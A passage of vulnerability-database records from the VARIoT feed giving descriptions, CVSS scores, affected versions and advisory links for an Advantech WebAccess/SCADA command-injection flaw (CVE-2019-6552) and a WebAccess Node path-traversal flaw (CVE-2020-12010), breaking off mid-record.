"https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech Made WebAccess HMI Designer Multiple vulnerabilities in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-007354" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202008-266" } ], "trust": 0.6 } }
var-201904-0182
Vulnerability from variot
Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple command injection vulnerabilities, caused by a lack of proper validation of user-supplied data, may allow remote code execution. Advantech WebAccess/SCADA Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Client. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwrunmie.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following vulnerabilities: 1. Multiple command-injection vulnerabilities 2. A denial-of-service vulnerability 3. Multiple stack-based buffer-overflow vulnerabilities An attacker can exploit these issues to inject and execute arbitrary commands in the context of the application. Failed exploit attempts will result in denial-of-service conditions. The vulnerability comes from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.3.5 and less" }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "BID", "id": "107675" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "NVD", "id": "CVE-2019-6552" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-003120" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" } ], "trust": 1.4 }, "cve": "CVE-2019-6552", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-6552", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2019-08949", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-157987", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-6552", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-6552", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-6552", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-6552", "trust": 1.4, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2019-6552", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-6552", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-08949", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201904-091", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-157987", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2019-6552", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "VULHUB", "id": "VHN-157987" }, { "db": "VULMON", "id": "CVE-2019-6552" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "CNNVD", "id": "CNNVD-201904-091" }, { "db": "NVD", "id": "CVE-2019-6552" } ] }, "description": { "_id": null, "data": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple command injection vulnerabilities, caused by a lack of proper validation of user-supplied data, may allow remote code execution. Advantech WebAccess/SCADA Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Client. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwrunmie.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following vulnerabilities:\n1. Multiple command-injection vulnerabilities\n2. A denial-of-service vulnerability\n3. Multiple stack-based buffer-overflow vulnerabilities\nAn attacker can exploit these issues to inject and execute arbitrary commands in the context of the application. Failed exploit attempts will result in denial-of-service conditions. The vulnerability comes from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data", "sources": [ { "db": "NVD", "id": "CVE-2019-6552" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "BID", "id": "107675" }, { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "VULHUB", "id": "VHN-157987" }, { "db": "VULMON", "id": "CVE-2019-6552" } ], "trust": 4.05 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-6552", "trust": 5.1 }, { "db": "ICS CERT", "id": "ICSA-19-092-01", "trust": 3.5 }, { "db": "ZDI", "id": "ZDI-19-326", "trust": 1.3 }, { "db": "BID", "id": "107675", "trust": 1.0 }, { "db": "CNNVD", "id": "CNNVD-201904-091", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-08949", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-003120", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7928", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7926", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-324", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.1113", "trust": 0.6 }, { "db": "IVD", "id": "7965849B-AD7C-448A-ABFE-D9BB6EA63FFA", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-157987", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2019-6552", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "VULHUB", "id": "VHN-157987" }, { "db": "VULMON", "id": "CVE-2019-6552" }, { "db": "BID", "id": "107675" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "CNNVD", "id": "CNNVD-201904-091" }, { "db": "NVD", "id": "CVE-2019-6552" } ] }, "id": "VAR-201904-0182", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "VULHUB", "id": "VHN-157987" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "CNVD", "id": "CNVD-2019-08949" } ] }, "last_update_date": "2024-11-23T22:17:06.420000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess/SCADA Command Injection Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/157943" }, { "title": "Advantech WebAccess and Advantech WebAccess/SCADA Fixes for command injection vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=91015" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "CNNVD", "id": "CNNVD-201904-091" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-77", "trust": 1.9 }, { "problemtype": "CWE-78", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-157987" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "NVD", "id": "CVE-2019-6552" } ] }, "references": { "_id": null, "data": [ { "trust": 5.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-092-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6552" }, { "trust": 1.3, "url": "http://www.securityfocus.com/bid/107675" }, { "trust": 0.9, "url": "https://www.advantech.com/" }, { "trust": 0.9, "url": "https://support.advantech.com/support/downloadsrdetail_new.aspx?sr_id=1-ms9mjv\u0026doc_source=download" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6552" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-326/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/78318" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/78.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-326" }, { "db": "ZDI", "id": "ZDI-19-324" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "VULHUB", "id": "VHN-157987" }, { "db": "VULMON", "id": "CVE-2019-6552" }, { "db": "BID", "id": "107675" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" }, { "db": "CNNVD", "id": "CNNVD-201904-091" }, { "db": "NVD", "id": "CVE-2019-6552" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa", "ident": null }, { "db": "ZDI", "id": "ZDI-19-326", "ident": null }, { "db": "ZDI", "id": "ZDI-19-324", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-08949", "ident": null }, { "db": "VULHUB", "id": "VHN-157987", "ident": null }, { "db": "VULMON", "id": "CVE-2019-6552", "ident": null }, { "db": "BID", "id": "107675", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-003120", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201904-091", "ident": null }, { "db": "NVD", "id": "CVE-2019-6552", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-04-03T00:00:00", "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-326", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-324", "ident": null }, { "date": "2019-04-03T00:00:00", "db": "CNVD", "id": "CNVD-2019-08949", "ident": null }, { "date": "2019-04-05T00:00:00", "db": "VULHUB", "id": "VHN-157987", "ident": null }, { "date": "2019-04-05T00:00:00", "db": "VULMON", "id": "CVE-2019-6552", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "BID", "id": "107675", "ident": null }, { "date": "2019-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003120", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-091", "ident": null }, { "date": "2019-04-05T19:29:00.357000", "db": "NVD", "id": "CVE-2019-6552", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-326", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-324", "ident": null }, { "date": "2019-04-03T00:00:00", "db": "CNVD", "id": "CNVD-2019-08949", "ident": null }, { "date": "2020-10-06T00:00:00", "db": "VULHUB", "id": "VHN-157987", "ident": null }, { "date": "2020-10-06T00:00:00", "db": "VULMON", "id": "CVE-2019-6552", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "BID", "id": "107675", "ident": null }, { "date": "2019-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003120", "ident": null }, { "date": "2020-10-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-091", "ident": null }, { "date": "2024-11-21T04:46:40.877000", "db": "NVD", "id": "CVE-2019-6552", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-091" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess/SCADA Command injection vulnerability", "sources": [ { "db": "IVD", "id": "7965849b-ad7c-448a-abfe-d9bb6ea63ffa" }, { "db": "CNVD", "id": "CNVD-2019-08949" }, { "db": "JVNDB", "id": "JVNDB-2019-003120" } ], "trust": 1.6 }, "type": { "_id": null, "data": "operating system commend injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-091" } ], "trust": 0.6 } }
var-202005-0336
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application’s control. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be put into a state. This vulnerability allows remote attackers to delete arbitrary files on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x2715 in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete files in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required.
Advantech WebAccess Node has a path traversal vulnerability, which can be exploited by an attacker to inject and execute specially crafted input into memory. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Path traversal vulnerabilities exist in Advantech WebAccess Node 8.4.4 and earlier versions and 9.0.0 versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 3.5, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.9, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "ZDI", "id": "ZDI-20-448" }, { "db": "ZDI", "id": "ZDI-20-449" }, { "db": "ZDI", "id": "ZDI-20-447" }, { "db": "ZDI", "id": "ZDI-20-450" }, { "db": "ZDI", "id": "ZDI-20-446" }, { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "VULMON", "id": "CVE-2020-12010" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "NVD", "id": "CVE-2020-12010" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005163" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-20-448" }, { "db": "ZDI", "id": "ZDI-20-449" }, { "db": "ZDI", "id": "ZDI-20-447" }, { "db": "ZDI", "id": "ZDI-20-450" }, { "db": "ZDI", "id": "ZDI-20-446" } ], "trust": 3.5 }, "cve": "CVE-2020-12010", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2020-12010", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.8, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "JVNDB-2020-005163", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CNVD-2020-29744", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "864d8ee3-e266-42df-be35-529416cab683", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-164646", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2020-12010", "impactScore": 4.2, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 3.5, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 1.8, "id": "CVE-2020-12010", "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Local", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.1, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "JVNDB-2020-005163", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-12010", "trust": 3.5, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2020-12010", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-005163", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-29744", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202005-309", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164646", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2020-12010", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "ZDI", "id": "ZDI-20-448" }, { "db": "ZDI", "id": "ZDI-20-449" }, { "db": "ZDI", "id": "ZDI-20-447" }, { "db": "ZDI", "id": "ZDI-20-450" }, { "db": "ZDI", "id": "ZDI-20-446" }, { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "VULHUB", "id": "VHN-164646" }, { "db": "VULMON", "id": "CVE-2020-12010" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "CNNVD", "id": "CNNVD-202005-309" }, { "db": "NVD", "id": "CVE-2020-12010" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application\u2019s control. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be put into a state. This vulnerability allows remote attackers to delete arbitrary files on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x2715 in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete files in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. \n\r\n\r\nAdvantech WebAccess Node has a path traversal vulnerability, which can be exploited by an attacker to inject and execute specially crafted input into memory. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Path traversal vulnerabilities exist in Advantech WebAccess Node 8.4.4 and earlier versions and 9.0.0 versions", "sources": [ { "db": "NVD", "id": "CVE-2020-12010" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "ZDI", "id": "ZDI-20-448" }, { "db": "ZDI", "id": "ZDI-20-449" }, { "db": "ZDI", "id": "ZDI-20-447" }, { "db": "ZDI", "id": "ZDI-20-450" }, { "db": "ZDI", "id": "ZDI-20-446" }, { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "VULHUB", "id": "VHN-164646" }, { "db": "VULMON", "id": "CVE-2020-12010" } ], "trust": 5.85 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12010", "trust": 7.1 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "CNVD", "id": "CNVD-2020-29744", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-309", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005163", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10173", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-448", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10174", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-449", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10170", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-447", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10176", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-450", "trust": 0.7 }, { "db": 